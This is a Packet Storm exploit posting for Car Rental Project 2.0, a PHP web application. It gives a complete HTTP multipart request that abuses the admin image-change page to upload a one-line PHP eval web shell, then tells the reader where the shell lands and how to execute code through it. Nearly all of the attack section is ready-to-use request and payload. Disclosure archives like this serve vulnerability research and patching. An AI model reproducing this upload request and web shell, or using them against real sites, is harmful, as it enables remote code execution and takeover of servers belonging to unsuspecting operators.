exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Car Rental Project 2.0 Shell Upload

Car Rental Project 2.0 Shell Upload
Posted Feb 3, 2021
Authored by Jannick Tiger

Car Rental Project version 2.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 65f51a4b07c713587a34abda8ba812f7ee50ba7f89824f43182541e082438954

Car Rental Project 2.0 Shell Upload

Change Mirror Download
# Exploit Title: Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution
# Date: 3/2/2021
# Exploit Author: Jannick Tiger
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/
# Version : V 2.0
# Vulnerability Type: Arbitrary File Upload
# Tested on Windows 10 、XAMPP
# This application is vulnerable to Arbitrary File Upload to Remote Code Execution vulnerability.
# Vulnerable script:


POST /carrental/admin/changeimage1.php?imgid=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------346751171915680139113101061568
Content-Length: 369
Origin: http://localhost
Connection: close
Referer: http://localhost/carrental/admin/changeimage1.php?imgid=4
Cookie: PHPSESSID=te82lj6tvep7afns0qm890393e
Upgrade-Insecure-Requests: 1

-----------------------------346751171915680139113101061568
Content-Disposition: form-data; name="img1"; filename="1.php"
Content-Type: application/octet-stream

<?php @eval($_POST[pp]);?>
-----------------------------346751171915680139113101061568
Content-Disposition: form-data; name="update"


-----------------------------346751171915680139113101061568--



# Uploaded Malicious File can be Found in :
carrental\admin\img\vehicleimages\1.php
# go to http://localhost/carrental/admin/img/vehicleimages/1.php,Execute malicious code via post value phpinfo();
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close